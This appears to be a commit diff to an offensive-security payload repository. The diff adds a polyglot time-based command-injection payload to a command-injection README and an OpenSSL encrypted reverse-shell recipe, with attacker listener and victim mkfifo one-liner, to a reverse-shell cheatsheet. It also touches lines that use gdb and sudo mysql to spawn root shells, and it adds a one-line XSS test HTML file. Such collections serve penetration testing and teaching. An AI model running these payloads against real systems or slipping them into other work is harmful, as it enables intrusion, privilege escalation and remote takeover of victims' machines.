Polyglot Command Injection + XSS HTML file

Command injection/README.md

@@ -178,6 +178,15 @@ echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 ```
 
+```bash
+/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
+
+e.g:
+echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
+echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
+echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
+```
+
 ## References
 
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)

Methodology and Resources/Linux - Privilege Escalation.md

@@ -188,8 +188,8 @@ permit nopass demo as root cmd vim
 
 The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
 
-> gdb -nx -ex '!sh' -ex quit
-> sudo mysql -e '\! /bin/sh'
+> gdb -nx -ex '!sh' -ex quit    
+> sudo mysql -e '\! /bin/sh'    
 > strace -o /dev/null /bin/sh
 
 

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -97,6 +97,15 @@ ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 
+## OpenSSL
+
+```powershell
+hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
+
+user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
+```
+
 ### Powershell
 
 ```powershell

Upload insecure files/Extension HTML/xss.html

@@ -0,0 +1 @@
+<script>alert('XSS')</script>